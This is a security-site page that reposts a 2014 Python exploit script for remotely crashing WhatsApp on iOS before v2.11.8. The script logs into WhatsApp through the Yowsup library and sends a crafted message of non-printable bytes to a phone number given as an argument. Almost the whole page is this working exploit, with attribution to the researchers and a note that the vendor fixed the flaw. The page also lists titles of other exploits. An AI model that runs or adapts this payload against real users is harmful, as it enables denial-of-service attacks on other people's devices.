首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WhatsApp < v2.11.7 - Remote Crash
来源:jsanchez (at) seguridadofensiva.com 作者:Jaime 发布时间:2014-04-15  
#!/usr/bin/python
#-*- coding: utf-8 -*
  
# Title: WhatsApp Remote Crash on non-printable characters
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.7 and prior on iOS
# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4
# Solution Status: Fixed by Vendor on v2.11.8
# Date: 8/04/2014
#
# Authors:
#   Jaime Sánchez       @segofensiva    <jsanchez (at) seguridadofensiva.com>
#   Pablo San Emeterio  @psaneme        <psaneme (at) gmail.com>
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
# More info at:
#   http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html
# See the slides of the research/talk at RootedCON 2014 at:
#   http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014
  
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
  
import threading,time, base64
  
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
  
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
  
  
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone:    Your full phone number including country code, without '+' or '00'
# id:       This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
#       on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
#       of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
#       a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
#       or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config.cfg"
  
def getCredentials(config = DEFAULT_CONFIG):
    if os.path.isfile(config):
        f = open(config)
          
        phone = ""
        idx = ""
        pw = ""
        cc = ""
          
        try:
            for l in f:
                line = l.strip()
                if len(line) and line[0] not in ('#',';'):
                      
                    prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
                      
                    varname = prep[0].strip()
                    val = prep[1].strip()
                      
                    if varname == "phone":
                        phone = val
                    elif varname == "id":
                        idx = val
                    elif varname =="password":
                        pw =val
                    elif varname == "cc":
                        cc = val
  
            return (cc, phone, idx, pw);
        except:
            pass
  
    return 0
  
def main(phone):
    credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
  
    if credentials:
          
        countryCode, login, identity, password = credentials
        identity = Utilities.processIdentity(identity)
  
        password = base64.b64decode(password)
  
        # Custom message that will crash WhatsApp
        message = message = "\xf4\xaa\xde\x04\xbf"
  
        #print countryCode, login, identity, password
        wa = WhatsappEchoClient(phone, message)
        wa.login(login, password)
      
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("number", help="Phone number to send the crash message")
    parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    args = parser.parse_args()
  
    Debugger.enabled = args.verbose
    main(args.number)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer 10 & Adobe F
·Adobe Reader For Android Javas
·eScan Web Management Console C
·PDF Album 1.7 Local File Inclu
·Apple Mac OS X Lion Kernel xnu
·Unitrends Enterprise Backup 7.
·OpenSSL Heartbeat (Heartbleed)
·MS14-012 Microsoft Internet Ex
·Sophos Web Protection Applianc
·SAP Router Password Timing Att
·Heartbleed TLS/DTLS Informatio
·Jzip SEH Unicode Buffer Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved